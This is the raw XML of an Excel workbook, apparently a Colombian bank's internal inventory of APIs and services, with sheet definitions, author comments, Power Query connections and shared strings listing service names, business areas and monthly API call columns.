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ables/table6.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.table+xml"/>
  <Override PartName="/xl/comments4.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.comments+xml"/>
  <Override PartName="/xl/tables/table7.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.table+xml"/>
  <Override PartName="/xl/comments5.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.comments+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showInkAnnotation="0" updateLinks="never" codeName="ThisWorkbook" hidePivotFieldList="1" defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\dasantam\Downloads\talentotech\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4632CA39-0690-4301-AE75-BEB6258486B2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10300" tabRatio="771" activeTab="1" xr2:uid="{A741E7BF-6370-4CEA-A693-2C2FB98FF70C}"/>
  </bookViews>
  <sheets>
    <sheet name="Graficos" sheetId="27" r:id="rId1"/>
    <sheet name="Inventario de Servicios" sheetId="22" r:id="rId2"/>
    <sheet name="Hoja8" sheetId="21" state="hidden" r:id="rId3"/>
    <sheet name="Hoja7" sheetId="20" state="hidden" r:id="rId4"/>
    <sheet name="Hoja6" sheetId="19" state="hidden" r:id="rId5"/>
    <sheet name="Hoja4" sheetId="18" state="hidden" r:id="rId6"/>
    <sheet name="Servicios Gobierno" sheetId="14" r:id="rId7"/>
    <sheet name="Servicios MDP" sheetId="15" r:id="rId8"/>
    <sheet name="API IBM Cloud " sheetId="16" r:id="rId9"/>
    <sheet name="API ONPREMISE" sheetId="17" r:id="rId10"/>
    <sheet name="RUNTIME" sheetId="23" r:id="rId11"/>
    <sheet name="Servicios no Encontrados" sheetId="13" r:id="rId12"/>
    <sheet name="Proveedores Faltantes" sheetId="9" r:id="rId13"/>
    <sheet name="Servicios MDP RIN" sheetId="24" r:id="rId14"/>
    <sheet name="Lista" sheetId="12" r:id="rId15"/>
    <sheet name="Hoja5" sheetId="5" state="hidden" r:id="rId16"/>
    <sheet name="Hoja3" sheetId="3" state="hidden" r:id="rId17"/>
    <sheet name="Hoja2" sheetId="2" state="hidden" r:id="rId18"/>
    <sheet name="Hoja1" sheetId="1" state="hidden" r:id="rId19"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId20"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'API IBM Cloud '!$A$1:$W$204</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="9" hidden="1">'API ONPREMISE'!$A$1:$W$219</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="10" hidden="1">RUNTIME!$A$1:$J$3</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Servicios Gobierno'!$A$1:$W$441</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Servicios MDP'!$A$1:$W$102</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="13" hidden="1">'Servicios MDP RIN'!$A$1:$P$68</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="11" hidden="1">'Servicios no Encontrados'!$A$1:$J$38</definedName>
    <definedName name="APOYO_ADMINISTRATIVO_Y_FINANCIERO">Lista!$L$2:$L$6</definedName>
    <definedName name="APOYO_AL_NEGOCIO">Lista!$J$2:$J$6</definedName>
    <definedName name="CANALES_DIGITALES">Lista!$B$2:$B$6</definedName>
    <definedName name="CANALES_TRADICIONALES">Lista!$C$2:$C$6</definedName>
    <definedName name="CANALES_Y_CONTENIDOS_DIGITALES_PYMES">Lista!$D$2:$D$6</definedName>
    <definedName name="CLIENTES">Lista!$A$2:$A$6</definedName>
    <definedName name="DatosExternos_1" localSheetId="17" hidden="1">Hoja2!$A$1:$D$755</definedName>
    <definedName name="DatosExternos_1" localSheetId="5" hidden="1">Hoja4!$A$1:$W$441</definedName>
    <definedName name="DatosExternos_2" localSheetId="16" hidden="1">Hoja3!$A$1:$D$217</definedName>
    <definedName name="DatosExternos_2" localSheetId="4" hidden="1">Hoja6!$A$1:$W$102</definedName>
    <definedName name="DatosExternos_3" localSheetId="3" hidden="1">Hoja7!$A$1:$W$204</definedName>
    <definedName name="DatosExternos_4" localSheetId="15" hidden="1">Hoja5!$A$1:$D$47</definedName>
    <definedName name="DatosExternos_4" localSheetId="2" hidden="1">Hoja8!$A$1:$W$386</definedName>
    <definedName name="DatosExternos_5" localSheetId="1" hidden="1">'Inventario de Servicios'!$A$1:$W$1130</definedName>
    <definedName name="DESARROLLO_DE_SERVICIOS_E_INTEGRACION">Lista!$M$2:$M$6</definedName>
    <definedName name="Ecosistemas">Lista!$H$2:$H$6</definedName>
    <definedName name="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD">Lista!$K$2:$K$6</definedName>
    <definedName name="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI">Lista!$K$2:$K$6</definedName>
    <definedName name="FILIALES_DEL_EXTERIOR_Y_ALIADOS">Lista!$O$2:$O$6</definedName>
    <definedName name="INFORMACION">Lista!$N$2:$N$6</definedName>
    <definedName name="LEASING">Lista!$R$2:$R$6</definedName>
    <definedName name="MEDIOS_DE_PAGO">Lista!$G$2:$G$6</definedName>
    <definedName name="NEGOCIOS_DE_INVERSION">Lista!$I$2:$I$6</definedName>
    <definedName name="PRODUCTOS_DE_CAPTACION">Lista!$F$2:$F$6</definedName>
    <definedName name="PRODUCTOS_DE_FINANCIACION">Lista!$E$2:$E$6</definedName>
    <definedName name="SUFI">Lista!$Q$2:$Q$6</definedName>
    <definedName name="TRANSF_Y_SOP_APOYO_ADMINISTRATIVO_Y_FINANCIERO">Lista!$L$2:$L$6</definedName>
    <definedName name="TRANSF_Y_SOP_APOYO_AL_NEGOCIO">Lista!$J$2:$J$6</definedName>
    <definedName name="TRANSF_Y_SOP_CANALES_DIGITALES">Lista!$B$2:$B$6</definedName>
    <definedName name="TRANSF_Y_SOP_CANALES_TRADICIONALES">Lista!$C$2:$C$6</definedName>
    <definedName name="TRANSF_Y_SOP_CANALES_Y_CONTENIDOS_DIGITALES_PYMES">Lista!$D$2:$D$6</definedName>
    <definedName name="TRANSF_Y_SOP_CLIENTES">Lista!$A$2:$A$6</definedName>
    <definedName name="TRANSF_Y_SOP_DESARROLLO_DE_SERVICIOS_E_INTEGRACION">Lista!$M$2:$M$6</definedName>
    <definedName name="TRANSF_Y_SOP_ECOSISTEMAS_DE_RIESGOS__SEGURIDAD_Y_APOYO_TI">Lista!$K$2:$K$6</definedName>
    <definedName name="TRANSF_Y_SOP_ECOSISTEMAS_DE_RIESGOS_SEGURIDAD">Lista!$K$2:$K$6</definedName>
    <definedName name="TRANSF_Y_SOP_FILIALES_DEL_EXTERIOR_Y_ALIADOS">Lista!$O$2:$O$6</definedName>
    <definedName name="TRANSF_Y_SOP_INFORMACION">Lista!$N$2:$N$6</definedName>
    <definedName name="TRANSF_Y_SOP_LEASING">Lista!$R$2:$R$6</definedName>
    <definedName name="TRANSF_Y_SOP_MEDIOS_DE_PAGO">Lista!$G$2:$G$6</definedName>
    <definedName name="TRANSF_Y_SOP_NEGOCIOS_DE_INVERSION">Lista!$I$2:$I$6</definedName>
    <definedName name="TRANSF_Y_SOP_PRODUCTOS_DE_CAPTACION">Lista!$F$2:$F$6</definedName>
    <definedName name="TRANSF_Y_SOP_PRODUCTOS_DE_FINANCIACION">Lista!$E$2:$E$6</definedName>
    <definedName name="TRANSF_Y_SOP_SUFI">Lista!$Q$2:$Q$6</definedName>
  </definedNames>
  <calcPr calcId="191028"/>
  <pivotCaches>
    <pivotCache cacheId="0" r:id="rId21"/>
    <pivotCache cacheId="1" r:id="rId2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4" i="2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Carlos Mario Duque Montoya</author>
  </authors>
  <commentList>
    <comment ref="R1" authorId="0" shapeId="0" xr:uid="{3508A2EB-5B60-45F3-8E6C-56ECF1C2CB17}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="S1" authorId="0" shapeId="0" xr:uid="{F34D2AED-E037-4906-B9A4-B085BBD58907}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="T1" authorId="0" shapeId="0" xr:uid="{B548D23E-1F30-444D-8ADA-D478D3AEFDD9}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="U1" authorId="0" shapeId="0" xr:uid="{5AAE0D95-FEF6-4EFD-97E0-89280797FFF0}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="V1" authorId="0" shapeId="0" xr:uid="{1C006E3A-E4A6-4C8D-AAEF-9B4BEA9388D8}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="E27" authorId="0" shapeId="0" xr:uid="{9A681DA1-3134-483A-A44A-DED94B6B553B}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
Filiales del Exterior</t>
        </r>
      </text>
    </comment>
    <comment ref="E194" authorId="0" shapeId="0" xr:uid="{2A95A293-95EB-4703-8369-3E129ED569D1}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
Filiales del Exterior</t>
        </r>
      </text>
    </comment>
    <comment ref="E233" authorId="0" shapeId="0" xr:uid="{DB32D18A-B184-4A7E-9547-DCF0C4205F78}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
Filiales del Exterior</t>
        </r>
      </text>
    </comment>
    <comment ref="E362" authorId="0" shapeId="0" xr:uid="{A60B7A46-48FC-4AF0-96A0-BE13EE32DA7C}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
Filiales del Exterior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Carlos Mario Duque Montoya</author>
  </authors>
  <commentList>
    <comment ref="R1" authorId="0" shapeId="0" xr:uid="{CE5D57A1-D7A0-4FDC-90C8-6B4FBF709F61}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">Carlos Mario Duque Montoya:
</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="S1" authorId="0" shapeId="0" xr:uid="{D67045AA-F860-4915-98A5-B12FBA960E36}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">Carlos Mario Duque Montoya:
</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="T1" authorId="0" shapeId="0" xr:uid="{9E4B7C50-923B-43C2-871B-7EA537E29310}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="U1" authorId="0" shapeId="0" xr:uid="{C58E3041-7C68-403B-A1DB-3874C280EBD4}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="V1" authorId="0" shapeId="0" xr:uid="{5D0790DD-6676-45DE-A733-878988EBF8F6}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes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Carlos Mario Duque Montoya</author>
  </authors>
  <commentList>
    <comment ref="R1" authorId="0" shapeId="0" xr:uid="{6563E254-B8A2-4188-A924-9A5628131DFE}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="S1" authorId="0" shapeId="0" xr:uid="{A0D05F54-F0EC-4070-A40A-6266611B16F6}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="T1" authorId="0" shapeId="0" xr:uid="{028AF296-722E-4977-AA9B-300DF7AA48BA}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="U1" authorId="0" shapeId="0" xr:uid="{4CCE5DF6-454E-4EB8-8105-423C6265F61F}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="V1" authorId="0" shapeId="0" xr:uid="{C9D4D98E-2F18-45C8-850D-DF6BEB5829D0}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes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Carlos Mario Duque Montoya</author>
  </authors>
  <commentList>
    <comment ref="R1" authorId="0" shapeId="0" xr:uid="{1A9F345A-3DBC-4F34-BB46-66E4E7E4B21F}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="S1" authorId="0" shapeId="0" xr:uid="{208A5F34-19C1-4B8B-BD5D-19FB68CB9F4A}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="T1" authorId="0" shapeId="0" xr:uid="{D36DAAB9-8FD3-4A76-A0B5-EA9D4AD931B8}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="U1" authorId="0" shapeId="0" xr:uid="{6F586ABF-4DC2-477E-92B7-E92D8858C87C}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes</t>
        </r>
      </text>
    </comment>
    <comment ref="V1" authorId="0" shapeId="0" xr:uid="{541F5A63-A5DA-459E-B7A7-5044E9613926}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Carlos Mario Duque Montoya:</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
API Call Mes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Carlos Mario Duque Montoya</author>
  </authors>
  <commentList>
    <comment ref="O3" authorId="0" shapeId="0" xr:uid="{036BADBE-811A-40E8-8107-C31A98F8FED5}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">El componente IAM hace parte de Filiales del Exterior?
O que FullStack pertenece? </t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="N4" authorId="0" shapeId="0" xr:uid="{7A48E68A-1FE6-4F31-9624-C0B9D7ED0E42}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Tener Presente ingresar al Archivo las otras versiones del servicios Recuperar Datos Clientes</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="A5" authorId="0" shapeId="0" xr:uid="{D2016548-A24F-4CF0-B8DE-5754645F5B50}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>SAP CRM Filiales del Exterior pertenece a este componente ???</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692D12-D7DB-4856-B07E-D89179EBA9EA}" keepAlive="1" name="Consulta - API IBM Cloud" description="Conexión a la consulta 'API IBM Cloud' en el libro." type="5" refreshedVersion="6" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=&quot;API IBM Cloud&quot;;Extended Properties=&quot;&quot;" command="SELECT * FROM [API IBM Cloud]"/>
  </connection>
  <connection id="2" xr16:uid="{C3C7D843-5921-460B-BE96-22B97ADC3353}" keepAlive="1" name="Consulta - API ONPREMISE" description="Conexión a la consulta 'API ONPREMISE' en el libro." type="5" refreshedVersion="6" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=&quot;API ONPREMISE&quot;;Extended Properties=&quot;&quot;" command="SELECT * FROM [API ONPREMISE]"/>
  </connection>
  <connection id="3" xr16:uid="{2A2C9841-EA53-47F0-9BE7-7C261EC0A829}" keepAlive="1" name="Consulta - Consolidado" description="Conexión a la consulta 'Consolidado' en el libro." type="5" refreshedVersion="6" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=Consolidado;Extended Properties=&quot;&quot;" command="SELECT * FROM [Consolidado]"/>
  </connection>
  <connection id="4" xr16:uid="{6C927F7E-B1EF-42B3-88FD-C4119B2DBBB5}" keepAlive="1" name="Consulta - Servicios Gobierno" description="Conexión a la consulta 'Servicios Gobierno' en el libro." type="5" refreshedVersion="6" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=&quot;Servicios Gobierno&quot;;Extended Properties=&quot;&quot;" command="SELECT * FROM [Servicios Gobierno]"/>
  </connection>
  <connection id="5" xr16:uid="{9C47A03B-ABAA-414B-ABED-AD2A4B6E2EC3}" keepAlive="1" name="Consulta - Servicios MDP" description="Conexión a la consulta 'Servicios MDP' en el libro." type="5" refreshedVersion="6" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=&quot;Servicios MDP&quot;;Extended Properties=&quot;&quot;" command="SELECT * FROM [Servicios MDP]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="49108" uniqueCount="5725">
  <si>
    <t>Gráfico que nos muestra la Cantidad de APIS y Servicios en Producción :</t>
  </si>
  <si>
    <t>TIPO</t>
  </si>
  <si>
    <t>APIS Y SERVICIOS</t>
  </si>
  <si>
    <t xml:space="preserve">API IBM Cloud </t>
  </si>
  <si>
    <t>API ONPREMISE</t>
  </si>
  <si>
    <t>Servicio</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Gráfico que nos muestra la Cantidad de APIS por EVC :</t>
  </si>
  <si>
    <t>EVC</t>
  </si>
  <si>
    <t>Cuenta de las APIs por EVC</t>
  </si>
  <si>
    <t>Autenticación y Monitoreo</t>
  </si>
  <si>
    <t>Baas-Depositos como Servicio</t>
  </si>
  <si>
    <t>Ciclo de Crédito</t>
  </si>
  <si>
    <t>Conocimiento de clientes</t>
  </si>
  <si>
    <t>DATOS, ANALÍTICA, IA, BLOCKCHAIN</t>
  </si>
  <si>
    <t>Depósitos y cuentas especiales</t>
  </si>
  <si>
    <t>Distribución Digital</t>
  </si>
  <si>
    <t>ECOSISTEMAS</t>
  </si>
  <si>
    <t>Evolución Digital</t>
  </si>
  <si>
    <t>Financiación y consumo</t>
  </si>
  <si>
    <t>Galatea</t>
  </si>
  <si>
    <t>Gestión de flujos</t>
  </si>
  <si>
    <t>Inclusión</t>
  </si>
  <si>
    <t>Inmobiliario</t>
  </si>
  <si>
    <t>Inversiones</t>
  </si>
  <si>
    <t>Leasing</t>
  </si>
  <si>
    <t>Medios de pago Aceptacion</t>
  </si>
  <si>
    <t>Medios de pago Emision</t>
  </si>
  <si>
    <t>Pymes y Empresas</t>
  </si>
  <si>
    <t>Seguros</t>
  </si>
  <si>
    <t>Servicios e Integració​​​​​​​​​​​​​​n</t>
  </si>
  <si>
    <t>SUFI</t>
  </si>
  <si>
    <t>Tesoreria</t>
  </si>
  <si>
    <t>Transversal I-Series y No I-Series</t>
  </si>
  <si>
    <t>Ventas Digitales y Tecnologias de Mercadeo</t>
  </si>
  <si>
    <t>Otras Funciones de Apoyo</t>
  </si>
  <si>
    <t>tu 360movilidad</t>
  </si>
  <si>
    <t>Pricing</t>
  </si>
  <si>
    <t>Por Definir</t>
  </si>
  <si>
    <t>Distribución Fisica</t>
  </si>
  <si>
    <t>Gestion integral del riesgo</t>
  </si>
  <si>
    <t>Gráfico que nos muestra los API CALL por MES da cada API en Producción :</t>
  </si>
  <si>
    <t>Etiquetas de columna</t>
  </si>
  <si>
    <t>Valores</t>
  </si>
  <si>
    <t>gwe-loans-alm-pre-loan-query</t>
  </si>
  <si>
    <t>Total general</t>
  </si>
  <si>
    <t>Mar</t>
  </si>
  <si>
    <t>Abr</t>
  </si>
  <si>
    <t>May</t>
  </si>
  <si>
    <t>Jun</t>
  </si>
  <si>
    <t>Jul</t>
  </si>
  <si>
    <t>Fecha</t>
  </si>
  <si>
    <t>Nombre Producto</t>
  </si>
  <si>
    <t>Version Producto</t>
  </si>
  <si>
    <t>NOMBRE DEL SERVICIO</t>
  </si>
  <si>
    <t>VER</t>
  </si>
  <si>
    <t>Nombre Tecnico Api</t>
  </si>
  <si>
    <t>DESCRIPCION</t>
  </si>
  <si>
    <t>ÁREA - COMPONENTE MAYOR</t>
  </si>
  <si>
    <t>COMPONENTE MENOR</t>
  </si>
  <si>
    <t>Tipo Productor</t>
  </si>
  <si>
    <t>Nombre Equipo</t>
  </si>
  <si>
    <t>Nombre Dueño de Producto</t>
  </si>
  <si>
    <t>SERVICIO PROVEEDOR</t>
  </si>
  <si>
    <t>PROVEEDOR</t>
  </si>
  <si>
    <t>CONSUMIDORES</t>
  </si>
  <si>
    <t>Marzo</t>
  </si>
  <si>
    <t>Abril</t>
  </si>
  <si>
    <t>Mayo</t>
  </si>
  <si>
    <t>Junio</t>
  </si>
  <si>
    <t>Julio</t>
  </si>
  <si>
    <t>Opcion Tipo</t>
  </si>
  <si>
    <t>No Aplica</t>
  </si>
  <si>
    <t>Acceder Acuerdo Trade</t>
  </si>
  <si>
    <t>Este Servicio esta Deprecado y no tiene Documentacion</t>
  </si>
  <si>
    <t>PRODUCTOS_DE_CAPTACION</t>
  </si>
  <si>
    <t>Captaciones</t>
  </si>
  <si>
    <t>Productor</t>
  </si>
  <si>
    <t>FINACLE - COLOMBIA_TRADE_AW0684001</t>
  </si>
  <si>
    <t>AW0718001 _x000D_
AW0504001 _x000D_
AW0360</t>
